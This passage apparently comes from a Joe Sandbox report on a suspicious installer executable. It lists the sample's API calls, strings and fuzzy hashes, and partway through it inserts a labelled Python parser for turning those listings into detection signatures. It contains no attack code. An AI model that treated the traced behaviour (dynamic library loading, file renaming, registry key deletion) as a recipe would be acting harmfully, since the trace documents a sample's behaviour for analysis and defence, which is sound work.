                                                                                                    • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007A0EF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EA1
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8
                                                                                                      • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405C71
                                                                                                      • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                    • Opcode ID: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
                                                                                                    • Instruction ID: 3bd9902b6e4cfcbbd8c27daddc785bf5092739fd3612ff4c635abc71f9dbf801
                                                                                                    • Opcode Fuzzy Hash: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
                                                                                                    • Instruction Fuzzy Hash: 30312531200B156FD3206B75DD48F2B3A5CDF85754F14043AB981F62D2DB7CE9018AAD
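The per-function "APIs" listings in these records are the most reusable part of the report for a practitioner: the call sequence and the string arguments (here "[Rename]", "%s=%s" and the sample's own path) are what you would turn into a YARA or behaviour signature, or compare with the PE import table. The following is an added example, not part of the Joe Sandbox report or its tooling, that parses that listing into structured records. The line format is an assumption inferred from the lines visible on this page ("Api.MODULE(arg,...), ref: ADDRESS", callee calls prefixed with "Part of subcall function ADDRESS:"); the sample input is six lines copied from the record above, labelled as constructed in the code. Argument values are the sandbox's best-effort stack reconstruction, so "?" means unresolved and a literal is only as reliable as that reconstruction.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report into records.

Added example, not part of the Joe Sandbox report or its tooling. The input
format is assumed from the lines visible on this page: one bullet per call,
"Api.MODULE(arg,arg,...), ref: ADDRESS", with calls made by callees prefixed
"Part of subcall function ADDRESS:".
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed sample: six lines copied from the record above (the routine at
# 0x00405D74 that writes the "[Rename]" entry), including one call without an
# argument list and two "Part of subcall function" lines.
SAMPLE = r"""
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
• GetShortPathNameA.KERNEL32(?,007A12F8,00000400), ref: 00405D7D
  • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
• wsprintfA.USER32 ref: 00405DB8
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
  • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405C71
"""

LINE_RE = re.compile(
    r"""^\s*(?:[•*]\s*)?
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]{8}):\ )?
        (?P<api>\w+)\.(?P<mod>\w+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)
# Joe Sandbox prints numeric arguments as 8 hex digits, optionally negated
# (e.g. -0000040A); anything else is "?" (unresolved) or a literal string.
HEX_RE = re.compile(r"-?[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # callee address if reported via a subcall

    @property
    def direct(self) -> bool:
        return self.subcall_of is None


def classify_arg(arg: str) -> str:
    """'unknown' for '?', 'number' for an 8-hex-digit value, else 'string'."""
    if arg == "?":
        return "unknown"
    if HEX_RE.fullmatch(arg):
        return "number"
    return "string"


def parse_report_apis(text: str) -> List[ApiCall]:
    """Return one ApiCall per matching line; headers and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def string_literals(calls: List[ApiCall]) -> Set[str]:
    """Every resolved, non-numeric argument: the strings worth turning into IOCs."""
    return {a for c in calls for a in c.args if classify_arg(a) == "string"}


def call_sequence(calls: List[ApiCall], direct_only: bool = True) -> List[str]:
    """API names in the order the report lists them (call-site address order)."""
    return [c.api for c in calls if c.direct or not direct_only]


def imports_by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Group APIs by module, the shape you would compare with the PE import table."""
    out: Dict[str, Set[str]] = {}
    for c in calls:
        out.setdefault(c.module, set()).add(c.api)
    return {mod: sorted(names) for mod, names in sorted(out.items())}


if __name__ == "__main__":
    parsed = parse_report_apis(SAMPLE)
    for call in parsed:
        where = "" if call.direct else f" (via subcall {call.subcall_of:08X})"
        print(f"{call.ref:08X} {call.module}!{call.api}{where} args={len(call.args)}")
    print("strings:", sorted(string_literals(parsed)))
    print("imports:", imports_by_module(parsed))
```

Feed it the "APIs" block of any record on this page (copied as text) and it yields the direct call sequence, the callee calls separately, and the string literals; the subcall lines are kept but flagged, because their arguments belong to a different stack frame and should not be attributed to the outer routine when you write a signature.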
                                                                                                    APIs
                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                                                                    • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                                                                    Strings
                                                                                                    • *?|<>/":, xrefs: 004063F7
                                                                                                    • "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 004063EB
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 589700163-1315701997
                                                                                                    • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                    • Instruction ID: 4c47756038ac22285ba0d5cec53aa64a9461198f7a7023556037c09898c6efe2
                                                                                                    • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                    • Instruction Fuzzy Hash: 5B11B6514047A129EB3216285C40B77BF888B97760F19407BE8D2722C2D77C5C5297BD
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004041DC
                                                                                                    • GetSysColor.USER32(00000000), ref: 0040421A
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404226
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00404232
                                                                                                    • GetSysColor.USER32(?), ref: 00404245
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404255
                                                                                                    • DeleteObject.GDI32(?), ref: 0040426F
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404279
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                    • Instruction ID: 0c29b1994579108119522ba9b7e42ccb12df1f79812dc60d22c4570354a7e24a
                                                                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                    • Instruction Fuzzy Hash: 6021A4B16007049BCB309F78DD08B5BBBF8AF81754B14896EFD92A26E0C734E904CB54
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AC6
• GetMessagePos.USER32 ref: 00404ACE
• ScreenToClient.USER32(?,?), ref: 00404AE8
• SendMessageA.USER32(?,00001111,00000000,?), ref: 00404AFA
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B20
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
• Instruction ID: 246458a00becd8bf3e45cced134e1bc678ff0f74541da5adfbd61824d77d36c3
• Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
• Instruction Fuzzy Hash: BC015E71900219BADB00DBA4DD85BFFBBBCAF55B11F10012BBB40B61D0C7B4A941CBA4
APIs
• GetDC.USER32(?), ref: 00401E38
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
• ReleaseDC.USER32(?,00000000), ref: 00401E6B
• CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Times New Roman
• API String ID: 3808545654-927190056
• Opcode ID: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
• Instruction ID: 57ae00d383071d6c5df03c611de82deed4414851ba4a5b5ac7ac255a7617b9b1
• Opcode Fuzzy Hash: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
• Instruction Fuzzy Hash: 0E019672500240AFD7006BB0AE4A79A3FF8D755301F108839F241B62F2C67804458BAC
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
• MulDiv.KERNEL32(000CCE2E,00000064,000CD760), ref: 00402E00
• wsprintfA.USER32 ref: 00402E10
• SetWindowTextA.USER32(?,?), ref: 00402E20
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
Strings
• verifying installer: %d%%, xrefs: 00402E0A
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
• Instruction ID: 5b578c44cce9eb850d5b1a327d08a3d6af9bf3f213875045bca18d45615f3dab
• Opcode Fuzzy Hash: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
• Instruction Fuzzy Hash: 6601447064020DFBEF109F60DE09EAE3769AB04304F00803AFA06A51D0DBB899519B5D
APIs
• CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
• GetLastError.KERNEL32 ref: 00405718
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
• GetLastError.KERNEL32 ref: 00405737
Strings
• C:\Users\user\Desktop, xrefs: 004056C1
• C:\Users\user\AppData\Local\Temp\, xrefs: 004056E7
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
• API String ID: 3449924974-1521822154
• Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
• Instruction ID: 68da7140adab9ac89dc439175e59da9b3464284d57dce40cdacedd7e8d7715c7
• Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
• Instruction Fuzzy Hash: E2011671C00219EADF00DFA1C944BEFBBB8EF04354F00403AD944B6290E7B89648DFA9
APIs
• GlobalAlloc.KERNEL32(00000040,0001C400,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
• GlobalFree.KERNEL32(?), ref: 0040288E
• GlobalFree.KERNEL32(00000000), ref: 004028A1
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
• Instruction ID: 541bef3258e2720658000fa94f276f2b73ea2b938264a1111491e3e624c892cf
• Opcode Fuzzy Hash: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
• Instruction Fuzzy Hash: BA21A072800128BBDF217FA5CE48DAE7E79EF05324F20423EF551762D1C67949418FA8
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                    • String ID: Haste.n$
                                                                                                    • API String ID: 2987980305-3391731235
                                                                                                    • Opcode ID: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
                                                                                                    • Instruction ID: b82e27a23205e400b7882a9dda540b85adfac7e99319b749728402aba69a9ded
                                                                                                    • Opcode Fuzzy Hash: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
                                                                                                    • Instruction Fuzzy Hash: 55213B32500110EBCF207F608F48A5F36B0AF51358F20423BF601B51D0CBBC49829A1E
                                                                                                    APIs
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1354259210-0
